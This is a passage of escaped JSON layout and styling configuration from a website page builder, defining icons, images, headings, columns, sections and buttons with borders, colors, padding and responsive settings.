79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c182\"]},{\"id\":786,\"type\":\"hop-image\",\"nodeId\":\"182-c322\",\"nodes\":[\"182-c184\"],\"v\":\"1.1\"},{\"id\":787,\"type\":\"hop-heading\",\"nodeId\":\"182-c323\",\"nodes\":[\"182-c185\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":788,\"type\":\"hop-text\",\"nodeId\":\"182-c324\",\"nodes\":[\"182-c186\"],\"v\":\"1.1\"},{\"id\":791,\"type\":\"hop-image\",\"nodeId\":\"182-c326\",\"nodes\":[\"182-c188\"],\"v\":\"1.1\"},{\"id\":792,\"type\":\"hop-heading\",\"nodeId\":\"182-c327\",\"nodes\":[\"182-c189\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":793,\"type\":\"hop-text\",\"nodeId\":\"182-c328\",\"nodes\":[\"182-c190\"],\"v\":\"1.1\"},{\"id\":795,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c191\"]},{\"id\":796,\"type\":\"hop-column\",\"nodeId\":\"182-c330\",\"nodes\":[\"182-c192\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":797,\"type\":\"hop-column\",\"nodeId\":\"182-c331\",\"nodes\":[\"182-c197\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":798,\"type\":\"hop-image\",\"nodeId\":\"182-c332\",\"nodes\":[\"182-c193\"],\"v\":\"1.1\"},{\"id\":799,\"type\":\"hop-heading\",\"nodeId\":\"182-c333\",\"nodes\":[\"182-c194\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":800,\"type\":\"hop-text\",\"nodeId\":\"182-c334\",\"nodes\":[\"182-c195\"],\"v\":\"1.1\"},{\"id\":802,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c196\"]},{\"id\":803,\"type\":\"hop-image\",\"nodeId\":\"182-c336\",\"nodes\":[\"182-c198\"],\"v\":\"1.1\"},{\"id\":804,\"type\":\"hop-heading\",\"nodeId\":\"182-c337\",\"nodes\":[\"182-c199\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":805,\"type\":\"hop-text\",\"nodeId\":\"182-c338\",\"nodes\":[\"182-c200\"],\"v\":\"1.1\"},{\"id\":807,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c201\"]},{\"id\":808,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c147\"],\"nodeId\":\"182-c147\"},{\"id\":828,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c149\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":829,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c150\"]},{\"id\":830,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c151\"]},{\"id\":831,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c152\"]},{\"id\":832,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c153\"]},{\"id\":833,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c154\"]},{\"id\":835,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c155\"]},{\"id\":842,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c156\"]},{\"id\":843,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c157\"]},{\"id\":844,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c158\"]},{\"id\":846,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c73\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":847,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c74\"]},{\"id\":848,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c75\",\"182-c81\",\"182-c87\",\"182-c93\",\"182-c99\",\"182-c105\",\"182-c110\",\"182-c116\",\"182-c122\",\"182-c128\",\"182-c140\",\"182-c134\",\"182-c228\",\"182-c234\"]},{\"id\":849,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c82\"]},{\"id\":850,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c77\",\"182-c83\",\"182-c89\",\"182-c95\",\"182-c101\",\"182-c107\",\"182-c112\",\"182-c118\",\"182-c124\",\"182-c130\",\"182-c142\",\"182-c136\",\"182-c230\",\"182-c236\"]},{\"id\":851,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c78\",\"182-c84\",\"182-c90\",\"182-c96\",\"182-c102\",\"182-c108\",\"182-c113\",\"182-c119\",\"182-c125\",\"182-c131\",\"182-c143\",\"182-c137\",\"182-c231\",\"182-c237\"]},{\"id\":852,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c91\"]},{\"id\":853,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c86\"]},{\"id\":854,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c76\",\"182-c94\",\"182-c100\",\"182-c106\",\"182-c111\",\"182-c117\",\"182-c123\",\"182-c129\",\"182-c141\",\"182-c135\",\"182-c229\",\"182-c235\"]},{\"id\":855,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c80\",\"182-c98\",\"182-c104\",\"182-c115\",\"182-c121\",\"182-c127\",\"182-c133\",\"182-c145\",\"182-c139\",\"182-c233\",\"182-c239\"]},{\"id\":856,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c88\"]},{\"id\":857,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c92\"]},{\"id\":858,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c293\"]},{\"id\":859,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c297\"]},{\"id\":860,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c146\"]},{\"id\":861,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c147\"]},{\"id\":862,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c148\"]},{\"id\":863,\"type\":\"hop-text\",\"props\":{\"type\":\"lead\"},\"v\":\"1.1\",\"nodes\":[\"182-c301\"]},{\"id\":864,\"type\":\"hop-button-group\",\"nodeId\":\"22-h35\",\"nodes\":[\"22-h35\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":865,\"type\":\"hop-button\",\"nodeId\":\"22-h36\",\"nodes\":[\"22-h36\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":866,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c38\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":867,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c39\"]},{\"id\":868,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-map1-1.jpg\"},\"size\":\"contain\",\"sizeCustom\":{\"x\":{\"value\":0}},\"position\":\"center center\",\"attachment\":\"scroll\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c40\"]},{\"id\":869,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c41\"]},{\"id\":872,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c44\"]},{\"id\":873,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c45\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":874,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c46\"]},{\"id\":875,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{